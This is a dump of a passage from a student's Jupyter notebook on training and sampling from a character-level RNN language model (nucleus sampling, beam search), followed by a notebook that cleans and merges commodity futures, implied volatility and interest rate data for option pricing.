"batch_size = 64 # <-- please tune batch size to fit your CPU/GPU configuration\nscore_dev_every = 250\ntrain_history, dev_history = [], []\n\nmodel = RNNLanguageModel(n_tokens=136)\nopt = torch.optim.Adam(model.parameters())\n\n# score untrained model\ndev_history.append((0, score_lines(model, dev_lines, batch_size)))\nprint(\"Sample before training:\", generate(model, 'Bridging'))",
"Sample before training: Bridgingv#,`ã°\n\n"
],
[
"from IPython.display import clear_output\nfrom random import sample\nfrom tqdm import trange\n\nfor i in trange(len(train_history), 5000):\n batch = to_matrix(sample(train_lines, batch_size))\n \n # <YOUR CODE - one step of the training loop for your RNN model>\n opt.zero_grad() \n loss_i = compute_loss(model, batch)\n loss_i.backward()\n nn.utils.clip_grad.clip_grad_value_(model.parameters(), 0.5)\n opt.step()\n\n train_history.append((i, float(loss_i)))\n \n if (i + 1) % 50 == 0:\n clear_output(True)\n plt.scatter(*zip(*train_history), alpha=0.1, label='train_loss')\n if len(dev_history):\n plt.plot(*zip(*dev_history), color='red', label='dev_loss')\n plt.legend(); plt.grid(); plt.show()\n print(\"Generated examples (tau=0.5):\")\n for _ in range(3):\n print(generate(model, temperature=0.5))\n \n if (i + 1) % score_dev_every == 0:\n print(\"Scoring dev...\")\n dev_history.append((i, score_lines(model, dev_lines, batch_size)))\n print('#%i Dev loss: %.3f' % dev_history[-1])\n",
"_____no_output_____"
],
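[
"# Optional sketch (not part of the original solution): the markdown above also mentions *global*\n# gradient clipping. PyTorch provides nn.utils.clip_grad_norm_, which rescales all gradients so that\n# their joint L2 norm stays below a threshold. The value 5.0 below is an assumed illustrative choice.\ndef clip_gradients_globally(parameters, max_norm=5.0):\n    \"\"\"Rescale gradients in-place so their global L2 norm is at most max_norm; returns the pre-clip norm.\"\"\"\n    return nn.utils.clip_grad_norm_(parameters, max_norm)\n\n# usage inside the training loop, between loss_i.backward() and opt.step():\n# clip_gradients_globally(model.parameters())",
"_____no_output_____"
],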
[
"assert np.mean(train_history[:10], axis=0)[1] > np.mean(train_history[-10:], axis=0)[1], \"The model didn't converge.\"\nprint(\"Final dev loss:\", dev_history[-1][-1])\nfor i in range(10):\n print(generate(model, temperature=0.5))",
"Final dev loss: 0.018180988125684784\n Learning to Determination on Model Herning for Non-Low-Rank Neural Networks ; We present a multi-ana\n An Event Sensing Approach for Image Convolutional Neural Networks ; Deep neural network to formaliza\n A New Sparse Segmentation ; The algorithm in the parameter and complete theoretical static constrain\n Neural Networks for deep Learning ; The problem of community to a control based on strategy of the a\n Structural Optimization and Experimental Learning ; We show to relate and important to some of the g\n A Bayesian networks and Proposed Learning ; In this paper, we propose a new approach to statisticall\n Real-Time Selection (LSTM) method for interest containing an algorithm for Recurrent Neural Networks\n Deep Learning for Measure for Streams ; The proposed approach to a generation of the same and explan\n Recurrent Neural Networks for Construction Sensing ; The network models for complex the statistical \n Link Convolutional Neural Networks for Monte Call Microses ; In this paper, we propose a new paramet\n"
]
],
[
[
"### Alternative sampling strategies (1 point)\n\nSo far we've sampled tokens from the model in proportion with their probability.\nHowever, this approach can sometimes generate nonsense words due to the fact that softmax probabilities of these words are never exactly zero. This issue can be somewhat mitigated with sampling temperature, but low temperature harms sampling diversity. Can we remove the nonsense words without sacrificing diversity? __Yes, we can!__ But it takes a different sampling strategy.\n\n__Top-k sampling:__ on each step, sample the next token from __k most likely__ candidates from the language model.\n\nSuppose $k=3$ and the token probabilities are $p=[0.1, 0.35, 0.05, 0.2, 0.3]$. You first need to select $k$ most likely words and set the probability of the rest to zero: $\\hat p=[0.0, 0.35, 0.0, 0.2, 0.3]$ and re-normalize: \n$p^*\\approx[0.0, 0.412, 0.0, 0.235, 0.353]$.\n\n__Nucleus sampling:__ similar to top-k sampling, but this time we select $k$ dynamically. In nucleous sampling, we sample from top-__N%__ fraction of the probability mass.\n\nUsing the same $p=[0.1, 0.35, 0.05, 0.2, 0.3]$ and nucleous N=0.9, the nucleous words consist of:\n1. most likely token $w_2$, because $p(w_2) < N$\n2. second most likely token $w_5$, $p(w_2) + p(w_5) = 0.65 < N$\n3. third most likely token $w_4$ because $p(w_2) + p(w_5) + p(w_4) = 0.85 < N$\n\nAnd thats it, because the next most likely word would overflow: $p(w_2) + p(w_5) + p(w_4) + p(w_1) = 0.95 > N$.\n\nAfter you've selected the nucleous words, you need to re-normalize them as in top-k sampling and generate the next token.\n\n__Your task__ is to implement nucleus sampling variant and see if its any good.",
"_____no_output_____"
]
],
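To make the nucleus arithmetic above concrete, here is a small standalone check (plain NumPy, using only the toy distribution from the text) that selects the nucleus for $p=[0.1, 0.35, 0.05, 0.2, 0.3]$ with $N=0.9$ and re-normalizes it:

```python
import numpy as np

p = np.array([0.1, 0.35, 0.05, 0.2, 0.3])
N = 0.9

order = np.argsort(-p)              # token indices, most likely first
cumulative = np.cumsum(p[order])    # running probability mass

# Keep the smallest prefix whose mass stays below N (but always at least one token)
keep = max(1, int(np.searchsorted(cumulative, N)))
nucleus = order[:keep]              # -> tokens w_2, w_5, w_4 for this example

p_star = np.zeros_like(p)
p_star[nucleus] = p[nucleus] / p[nucleus].sum()
print(p_star)                       # ~[0.    0.412 0.    0.235 0.353]
```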
[
[
"def generate_nucleus(model, prefix=BOS, nucleus=0.9, max_len=100):\n \"\"\"\n Generate a sequence with nucleous sampling\n :param prefix: a string containing space-separated previous tokens\n :param nucleus: N from the formulae above, N \\in [0, 1]\n :param max_len: generate sequences with at most this many tokens, including prefix\n \n :note: make sure that nucleous always contains at least one word, even if p(w*) > nucleus\n \n \"\"\"\n while True:\n token_probs = model.get_possible_next_tokens(prefix)\n tokens, probs = zip(*sorted(token_probs.items(), key=lambda x: x[1], reverse=True))\n probs = list(probs)\n prob_sum = 0\n max_idx = 0\n for i in range(len(probs)):\n prob_sum += probs[i]\n if prob_sum > nucleus:\n max_idx = i\n break\n for j in range(max_idx + 1, len(probs)): probs[j] = 0\n norm = np.sum(probs)\n probs = [p/norm for p in probs]\n next_token = np.random.choice(tokens, p=probs)\n \n prefix += next_token\n if next_token == EOS or len(prefix) > max_len: break\n return prefix",
"_____no_output_____"
],
[
"for i in range(10):\n print(generate_nucleus(model))",
" Point of Multi-Reguling Optimization Based Graph ; A Classification algorithms in the properties of \n The Variational Face Mutation Assessment of Bayesian Action Approach to Cameras ; We introduce the S\n A Huper Analysis of Image Recognition in Latent Deformation of Results ; This paper and sensing a mu\n Interest-based Design Scenario Towards Based Reported Matrix Fully Neural Network for Find Combinano\n Shary Detection Images Makes with Distribution in Erguine Mutual Generative Models ; We introduce th\n Regression with Matagative Field consistency for for a specific tracking ; As the results with sou\n For a Task Emploted Via Geometry Activation ; In this paper, we exploit consist loss in the experi\n Segmentation in Challenging Usel Level Independent Learning ; This paper is to estimate the research\n A New Extraction ; Deconvolutions and often unknowledges in so not approaches. The end-to-end first \n Multi-Form in Interpretability of Estimation ; Computer vision problem by solution and devices subsp\n"
]
],
[
[
"### Bonus quest I: Beam Search (2 pts incl. samples)\n\nAt times, you don't really want the model to generate diverse outputs as much as you want a __single most likely hypothesis.__ A single best translation, most likely continuation of the search query given prefix, etc. Except, you can't get it. \n\nIn order to find the exact most likely sequence containing 10 tokens, you would need to enumerate all $|V|^{10}$ possible hypotheses. In practice, 9 times out of 10 you will instead find an approximate most likely output using __beam search__.\n\nHere's how it works:\n0. Initial `beam` = [prefix], max beam_size = k\n1. for T steps:\n2. ` ... ` generate all possible next tokens for all hypotheses in beam, formulate `len(beam) * len(vocab)` candidates\n3. ` ... ` select beam_size best for all candidates as new `beam`\n4. Select best hypothesis (-es?) from beam",
"_____no_output_____"
]
],
[
[
"from IPython.display import HTML\n# Here's what it looks like:\n!wget -q https://raw.githubusercontent.com/yandexdataschool/nlp_course/2020/resources/beam_search.html\nHTML(\"beam_search.html\")",
"_____no_output_____"
],
[
"def generate_beamsearch(model, prefix=BOS, beam_size=4, length=5):\n \"\"\"\n Generate a sequence with nucleous sampling\n :param prefix: a string containing space-separated previous tokens\n :param nucleus: N from the formulae above, N \\in [0, 1]\n :param length: generate sequences with at most this many tokens, NOT INCLUDING PREFIX\n :returns: beam_size most likely candidates\n :note: make sure that nucleous always contains at least one word, even if p(w*) > nucleus\n \"\"\"\n \n # <YOUR CODE HERE>\n sequence_prob = []\n for i in range(length):\n if len(sequence_prob) == 0:\n token_probs = model.get_possible_next_tokens(prefix)\n token_probs = sorted(token_probs.items(), key=lambda x: x[1], reverse=True)\n sequence_prob = [(token, np.log(prob)) for token, prob in token_probs[:beam_size]]\n else:\n sequence_prob_new = []\n for tok, log_prob in sequence_prob:\n prefix_new = prefix + tok\n # print(f'prefix: {prefix_new}')\n token_probs = model.get_possible_next_tokens(prefix_new)\n token_probs = sorted(token_probs.items(), key=lambda x: x[1], reverse=True)\n sequence_prob_new += [(tok +token, log_prob + np.log(prob)) for token, prob in token_probs[:beam_size]]\n # print(f'sequence_prob_new: {sequence_prob_new}')\n sequence_prob = sorted(sequence_prob_new, key=lambda x: x[1], reverse=True)[:beam_size]\n print(f'at time {i}, sequence_prob: {sequence_prob}')\n ...\n \n sequence_prob.sort(key=lambda x: x[1], reverse=True)\n return sequence_prob[0][0]\n ",
"_____no_output_____"
],
[
"generate_nucleus(model, prefix=' deep ', max_len=10)",
"_____no_output_____"
],
[
"generate_beamsearch(model, prefix=' deep ', beam_size=10)",
"at time 0, sequence_prob: [('l', -1.5068771), ('n', -1.8065959), ('L', -2.6358395), ('N', -2.8169146), ('c', -2.9389367), ('a', -3.3885388), (' ', -3.416483), ('C', -3.5385532), ('R', -3.5742204), ('e', -3.672916)]\nat time 1, sequence_prob: [('le', -1.5643963), ('ne', -1.8384411), ('Le', -2.836633), ('Ne', -2.8548415), ('co', -3.2234898), (' ', -3.5252151), ('Re', -3.7488828), ('Co', -4.04846), ('an', -4.1490107), ('en', -4.306381)]\nat time 2, sequence_prob: [('lea', -1.6008773), ('neu', -2.1250048), ('Lea', -2.9126318), ('Neu', -3.0605521), ('con', -3.4188592), ('net', -3.4200287), ('Con', -4.4806757), ('and', -4.520799), ('Rec', -4.668638), ('Net', -4.732559)]\nat time 3, sequence_prob: [('lear', -1.6240636), ('neur', -2.1312099), ('Lear', -2.9528904), ('Neur', -3.0653412), ('netw', -3.4399335), ('conv', -4.4241753), ('and ', -4.534765), ('cons', -4.6973867), ('Netw', -4.773192), ('Conv', -4.849742)]\nat time 4, sequence_prob: [('learn', -1.6297319), ('neura', -2.1763425), ('Learn', -2.9623094), ('Neura', -3.105021), ('netwo', -3.4438837), ('Netwo', -4.774398), ('convo', -4.823792), ('Convo', -5.1949706), ('neuro', -5.445722), ('const', -5.5541863)]\n"
],
[
"# check it out: which beam size works best?\n# find at least 5 prefixes where beam_size=1 and 8 generates different sequences",
"_____no_output_____"
]
],
[
[
"### Bonus quest II: Ultimate Language Model (2+ pts)\n\nSo you've learned the building blocks of neural language models, you can now build the ultimate monster: \n* Make it char-level, word level or maybe use sub-word units like [bpe](https://github.com/rsennrich/subword-nmt);\n* Combine convolutions, recurrent cells, pre-trained embeddings and all the black magic deep learning has to offer;\n * Use strides to get larger window size quickly. Here's a [scheme](https://storage.googleapis.com/deepmind-live-cms/documents/BlogPost-Fig2-Anim-160908-r01.gif) from google wavenet.\n* Train on large data. Like... really large. Try [1 Billion Words](http://www.statmt.org/lm-benchmark/1-billion-word-language-modeling-benchmark-r13output.tar.gz) benchmark;\n* Use training schedules to speed up training. Start with small length and increase over time; Take a look at [one cycle](https://medium.com/@nachiket.tanksale/finding-good-learning-rate-and-the-one-cycle-policy-7159fe1db5d6) for learning rate;\n\n_You are NOT required to submit this assignment. Please make sure you don't miss your deadline because of it :)_",
"_____no_output_____"
]
]
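If you try the one-cycle schedule mentioned above, PyTorch ships a ready-made scheduler. A minimal sketch of the wiring — the toy model, `max_lr` and step count below are placeholder values, not tuned settings for this task:

```python
import torch
import torch.nn as nn

toy_model = nn.Linear(10, 10)  # stand-in for your language model
opt = torch.optim.Adam(toy_model.parameters(), lr=1e-3)

# Ramp the learning rate up to max_lr and back down over total_steps updates
scheduler = torch.optim.lr_scheduler.OneCycleLR(opt, max_lr=1e-2, total_steps=5000)

for step in range(5000):
    # ... compute loss and call loss.backward() on your real model here ...
    opt.step()
    scheduler.step()
    opt.zero_grad()
```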
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb036ad9473e480f26fe806ac756d88284fb88e9 | 72,237 | ipynb | Jupyter Notebook | data_wrangling.ipynb | smseifi/commodity_option_pricing | 35088e691957fb6bf1aba1fb9cbfcd300b6b18fa | [
"MIT"
] | null | null | null | data_wrangling.ipynb | smseifi/commodity_option_pricing | 35088e691957fb6bf1aba1fb9cbfcd300b6b18fa | [
"MIT"
] | null | null | null | data_wrangling.ipynb | smseifi/commodity_option_pricing | 35088e691957fb6bf1aba1fb9cbfcd300b6b18fa | [
"MIT"
] | null | null | null | 29.496529 | 129 | 0.402951 | [
[
[
"import os\n\nimport numpy as np\nimport pandas as pd \nimport matplotlib.pyplot as plt\n\nfrom pandas.tseries.frequencies import to_offset",
"_____no_output_____"
],
[
"print(*os.listdir(\"./data\"), sep=\"\\n\")",
"wrangled_data\norig_data\n"
],
[
"orig_data_dir = \"./data/orig_data/\"\nprint(*os.listdir(orig_data_dir), sep=\"\\n\")",
"PricesFile1.csv\nNG_ImpliedVols2020.csv\nNG_ImpliedVols2022.csv\nNG_ImpliedVols2021.csv\nWTI_ImpliedVols2022.csv\nWTI_ImpliedVols2020.csv\nWTI_ImpliedVols2021.csv\nInterestRates.csv\n"
],
[
"prices_df = pd.read_csv(orig_data_dir+\"PricesFile1.csv\")\nprices_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 6130 entries, 0 to 6129\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 priceindex 6130 non-null object \n 1 pricedate 6130 non-null object \n 2 delivdate 6130 non-null object \n 3 price 6130 non-null float64\ndtypes: float64(1), object(3)\nmemory usage: 191.7+ KB\n"
],
[
"prices_df.head()",
"_____no_output_____"
],
[
"prices_df.pricedate, prices_df.delivdate = pd.to_datetime(prices_df.pricedate), pd.to_datetime(prices_df.delivdate)\nprices_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 6130 entries, 0 to 6129\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 priceindex 6130 non-null object \n 1 pricedate 6130 non-null datetime64[ns]\n 2 delivdate 6130 non-null datetime64[ns]\n 3 price 6130 non-null float64 \ndtypes: datetime64[ns](2), float64(1), object(1)\nmemory usage: 191.7+ KB\n"
],
[
"prices_df.rename(columns={\"priceindex\" : \"index\", \"pricedate\" : \"t\", \"delivdate\" : \"T\", \"price\" : \"F\"}, \n inplace=True)\nprices_df.head()",
"_____no_output_____"
],
[
"p_i = prices_df[\"index\"].unique()\nprint(*p_i, sep=\"\\n\")",
"AECO NIT MONTHLY (7A) US$\nAECO NIT MONTHLY (7A) US$ FWD\nNYMEX Natural Gas\nWTI NYMEX LIGHT SWEET\n"
],
[
"prices_df[\"index\"].value_counts()",
"_____no_output_____"
],
[
"grouped_by_p_i = prices_df.groupby(\"index\")",
"_____no_output_____"
],
[
"for i in range(len(p_i)):\n \n df = grouped_by_p_i.get_group(p_i[i])\n print(\"index : \" + p_i[i])\n print(\"t_min is \" + str(min(df.t).date()) + \"\\t\" + \"t_max is \" + str(max(df.t).date()))\n print(\"T_min is \" + str(min(df[\"T\"]).date()) + \"\\t\" + \"T_max is \" + str(max(df[\"T\"]).date()) + \"\\n\")\n \n del df\ndel i",
"index : AECO NIT MONTHLY (7A) US$\nt_min is 2020-03-01\tt_max is 2020-05-01\nT_min is 2020-03-01\tT_max is 2020-05-01\n\nindex : AECO NIT MONTHLY (7A) US$ FWD\nt_min is 2020-03-02\tt_max is 2020-05-29\nT_min is 2020-04-01\tT_max is 2022-12-01\n\nindex : NYMEX Natural Gas\nt_min is 2020-03-02\tt_max is 2020-05-29\nT_min is 2020-04-01\tT_max is 2022-12-01\n\nindex : WTI NYMEX LIGHT SWEET\nt_min is 2020-03-02\tt_max is 2020-05-29\nT_min is 2020-03-01\tT_max is 2022-12-01\n\n"
],
[
"df = prices_df[prices_df.t > prices_df[\"T\"]]\ndf.head()",
"_____no_output_____"
],
[
"df[\"index\"].value_counts()",
"_____no_output_____"
],
[
"df.nunique()",
"_____no_output_____"
],
[
"del df",
"_____no_output_____"
],
[
"AECO_futures_df = grouped_by_p_i.get_group(p_i[1])\nAECO_futures_df.head()",
"_____no_output_____"
],
[
"AECO_futures_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 2049 entries, 3 to 2051\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 2049 non-null object \n 1 t 2049 non-null datetime64[ns]\n 2 T 2049 non-null datetime64[ns]\n 3 F 2049 non-null float64 \ndtypes: datetime64[ns](2), float64(1), object(1)\nmemory usage: 80.0+ KB\n"
],
[
"AECO_futures_df.to_csv(r\"./data/wrangled_data/AECO_futures.csv\", index=False)",
"_____no_output_____"
],
[
"NG_futures_df = grouped_by_p_i.get_group(p_i[2])\nNG_futures_df.head()",
"_____no_output_____"
],
[
"NG_futures_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 2018 entries, 2052 to 4069\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 2018 non-null object \n 1 t 2018 non-null datetime64[ns]\n 2 T 2018 non-null datetime64[ns]\n 3 F 2018 non-null float64 \ndtypes: datetime64[ns](2), float64(1), object(1)\nmemory usage: 78.8+ KB\n"
],
[
"NG_futures_df.to_csv(r\"./data/wrangled_data/NG_futures.csv\", index=False)",
"_____no_output_____"
],
[
"WTI_futures_df = grouped_by_p_i.get_group(p_i[3])\nWTI_futures_df = WTI_futures_df[WTI_futures_df.t < WTI_futures_df[\"T\"]]\nWTI_futures_df.head()",
"_____no_output_____"
],
[
"WTI_futures_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 1997 entries, 4071 to 6129\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 1997 non-null object \n 1 t 1997 non-null datetime64[ns]\n 2 T 1997 non-null datetime64[ns]\n 3 F 1997 non-null float64 \ndtypes: datetime64[ns](2), float64(1), object(1)\nmemory usage: 78.0+ KB\n"
],
[
"WTI_futures_df.to_csv(r\"./data/wrangled_data/WTI_futures.csv\", index=False)",
"_____no_output_____"
],
[
"NG_IV_20_df = pd.read_csv(orig_data_dir+\"NG_ImpliedVols2020.csv\")\nNG_IV_20_df.head()",
"_____no_output_____"
],
[
"NG_IV_20_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 33212 entries, 0 to 33211\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 33212 non-null object \n 1 volatilitydate 33212 non-null object \n 2 strikeprice 33212 non-null float64\n 3 begtime 33212 non-null object \n 4 volatility 33212 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 1.3+ MB\n"
],
[
"NG_IV_21_df = pd.read_csv(orig_data_dir+\"NG_ImpliedVols2021.csv\")\nNG_IV_21_df.head()",
"_____no_output_____"
],
[
"NG_IV_21_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 59166 entries, 0 to 59165\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 59166 non-null object \n 1 volatilitydate 59166 non-null object \n 2 strikeprice 59166 non-null float64\n 3 begtime 59166 non-null object \n 4 volatility 59166 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 2.3+ MB\n"
],
[
"NG_IV_22_df = pd.read_csv(orig_data_dir+\"NG_ImpliedVols2022.csv\")\nNG_IV_22_df.head()",
"_____no_output_____"
],
[
"NG_IV_22_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 60480 entries, 0 to 60479\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 60480 non-null object \n 1 volatilitydate 60480 non-null object \n 2 strikeprice 60480 non-null float64\n 3 begtime 60480 non-null object \n 4 volatility 60480 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 2.3+ MB\n"
],
[
"frames = [NG_IV_20_df, NG_IV_21_df, NG_IV_22_df]\nNG_IV_df = pd.concat(frames)\n\ndel frames",
"_____no_output_____"
],
[
"NG_IV_df.rename(columns={\"volatilityindex\" : \"index\", \"volatilitydate\" : \"t\", \"strikeprice\" : \"K\",\n \"begtime\" : \"T\", \"volatility\" : \"sigma\"}, inplace=True)\nNG_IV_df = NG_IV_df[[\"index\", \"t\", \"T\", \"K\", \"sigma\"]]\nNG_IV_df[\"index\"] = \"NYMEX Natural Gas\"\nNG_IV_df.head()",
"_____no_output_____"
],
[
"NG_IV_df[\"t\"], NG_IV_df[\"T\"] = pd.to_datetime(NG_IV_df[\"t\"]), pd.to_datetime(NG_IV_df[\"T\"])\nNG_IV_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 152858 entries, 0 to 60479\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 152858 non-null object \n 1 t 152858 non-null datetime64[ns]\n 2 T 152858 non-null datetime64[ns]\n 3 K 152858 non-null float64 \n 4 sigma 152858 non-null float64 \ndtypes: datetime64[ns](2), float64(2), object(1)\nmemory usage: 7.0+ MB\n"
],
[
"for i in [\"t\", \"T\"]:\n print(i + \"_min is \" + str(min(NG_IV_df[i]).date()) + \"\\t\" + i + \"_max is \" + str(max(NG_IV_df[i]).date())\n + \"\\n\")\ndel i",
"t_min is 2020-03-02\tt_max is 2020-05-29\n\nT_min is 2020-04-01\tT_max is 2022-12-01\n\n"
],
[
"WTI_IV_20_df = pd.read_csv(orig_data_dir+\"WTI_ImpliedVols2020.csv\")\nWTI_IV_20_df.head()",
"_____no_output_____"
],
[
"WTI_IV_20_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 32968 entries, 0 to 32967\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 32968 non-null object \n 1 volatilitydate 32968 non-null object \n 2 strikeprice 32968 non-null float64\n 3 begtime 32968 non-null object \n 4 volatility 32968 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 1.3+ MB\n"
],
[
"WTI_IV_21_df = pd.read_csv(orig_data_dir+\"WTI_ImpliedVols2021.csv\")\nWTI_IV_21_df.head()",
"_____no_output_____"
],
[
"WTI_IV_21_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 35134 entries, 0 to 35133\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 35134 non-null object \n 1 volatilitydate 35134 non-null object \n 2 strikeprice 35134 non-null float64\n 3 begtime 35134 non-null object \n 4 volatility 35134 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 1.3+ MB\n"
],
[
"WTI_IV_22_df = pd.read_csv(orig_data_dir+\"WTI_ImpliedVols2022.csv\")\nWTI_IV_22_df.head()",
"_____no_output_____"
],
[
"WTI_IV_22_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 9639 entries, 0 to 9638\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 9639 non-null object \n 1 volatilitydate 9639 non-null object \n 2 strikeprice 9639 non-null float64\n 3 begtime 9639 non-null object \n 4 volatility 9639 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 376.6+ KB\n"
],
[
"frames = [WTI_IV_20_df, WTI_IV_21_df, WTI_IV_22_df]\nWTI_IV_df = pd.concat(frames)\n\ndel frames",
"_____no_output_____"
],
[
"WTI_IV_df.rename(columns={\"volatilityindex\" : \"index\", \"volatilitydate\" : \"t\", \"strikeprice\" : \"K\",\n \"begtime\" : \"T\", \"volatility\" : \"sigma\"}, inplace=True)\nWTI_IV_df = WTI_IV_df[[\"index\", \"t\", \"T\", \"K\", \"sigma\"]]\nWTI_IV_df[\"index\"] = \"WTI NYMEX LIGHT SWEET\"\nWTI_IV_df.head()",
"_____no_output_____"
],
[
"WTI_IV_df[\"t\"], WTI_IV_df[\"T\"] = pd.to_datetime(WTI_IV_df[\"t\"]), pd.to_datetime(WTI_IV_df[\"T\"])\nWTI_IV_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 77741 entries, 0 to 9638\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 77741 non-null object \n 1 t 77741 non-null datetime64[ns]\n 2 T 77741 non-null datetime64[ns]\n 3 K 77741 non-null float64 \n 4 sigma 77741 non-null float64 \ndtypes: datetime64[ns](2), float64(2), object(1)\nmemory usage: 3.6+ MB\n"
],
[
"for i in [\"t\", \"T\"]:\n print(i + \"_min is \" + str(min(WTI_IV_df[i]).date()) + \"\\t\" + i + \"_max is \" + str(max(WTI_IV_df[i]).date())\n + \"\\n\")\ndel i",
"t_min is 2020-03-02\tt_max is 2020-05-29\n\nT_min is 2020-04-01\tT_max is 2022-12-01\n\n"
],
[
"IR_df = pd.read_csv(orig_data_dir+\"InterestRates.csv\")\nIR_df.head()",
"_____no_output_____"
],
[
"IR_df.pricedate = pd.to_datetime(IR_df.pricedate)\nIR_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 7085 entries, 0 to 7084\nData columns (total 3 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 pricedate 7085 non-null datetime64[ns]\n 1 maturity 7085 non-null object \n 2 bidrate 7085 non-null float64 \ndtypes: datetime64[ns](1), float64(1), object(1)\nmemory usage: 166.2+ KB\n"
],
[
"t = IR_df.pricedate.to_list()\nttm = [to_offset(i) for i in IR_df.maturity]\nT = [t[i] + ttm[i] + to_offset(\"1D\") for i in range(len(ttm))]\nIR_df.maturity = T",
"_____no_output_____"
],
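The cell above converts each maturity string into a date by adding a pandas `DateOffset`, plus one extra day, to the price date. A tiny self-contained check of that idea (the tenor label "3M" is just an illustrative value; month-end aliases land on the last day of the month, so the extra day pushes the result to the first of the following month, matching the `T` values seen in the data):

```python
import pandas as pd
from pandas.tseries.frequencies import to_offset

price_date = pd.Timestamp("2020-03-02")
tenor = "3M"  # hypothetical maturity label

# DateOffset arithmetic: roll to the third month-end, then add one day
maturity = price_date + to_offset(tenor) + to_offset("1D")
print(maturity)
```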
[
"IR_df.head()",
"_____no_output_____"
],
[
"IR_df.rename(columns={\"pricedate\" : \"t\", \"maturity\" : \"T\", \"bidrate\": \"r\"}, inplace=True)\nIR_df.head()",
"_____no_output_____"
],
[
"for i in [\"t\", \"T\"]:\n print(i + \"_min is \" + str(min(IR_df[i]).date()) + \"\\t\" + i + \"_max is \" + str(max(IR_df[i]).date())\n + \"\\n\")\ndel i",
"t_min is 2020-03-02\tt_max is 2020-05-29\n\nT_min is 2020-04-01\tT_max is 2029-06-01\n\n"
],
[
"NG_IV_df.set_index([\"t\", \"T\"], inplace=True)\nWTI_IV_df.set_index([\"t\", \"T\"], inplace=True)\nIR_df.set_index([\"t\", \"T\"], inplace=True)",
"_____no_output_____"
],
[
"NG_option_df = NG_IV_df.merge(IR_df, how=\"inner\", left_index=True, right_index=True)\nNG_option_df.drop(columns=\"index\", inplace=True)\nNG_option_df.reset_index(inplace=True)\nNG_option_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 152857 entries, 0 to 152856\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 t 152857 non-null datetime64[ns]\n 1 T 152857 non-null datetime64[ns]\n 2 K 152857 non-null float64 \n 3 sigma 152857 non-null float64 \n 4 r 152857 non-null float64 \ndtypes: datetime64[ns](2), float64(3)\nmemory usage: 5.8 MB\n"
],
[
"NG_option_df.to_csv(r\"./data/wrangled_data/NG_option.csv\", index=False)",
"_____no_output_____"
],
[
"WTI_option_df = WTI_IV_df.merge(IR_df, how=\"inner\", left_index=True, right_index=True)\nWTI_option_df.drop(columns=\"index\", inplace=True)\nWTI_option_df.reset_index(inplace=True)\nWTI_option_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 79354 entries, 0 to 79353\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 t 79354 non-null datetime64[ns]\n 1 T 79354 non-null datetime64[ns]\n 2 K 79354 non-null float64 \n 3 sigma 79354 non-null float64 \n 4 r 79354 non-null float64 \ndtypes: datetime64[ns](2), float64(3)\nmemory usage: 3.0 MB\n"
],
[
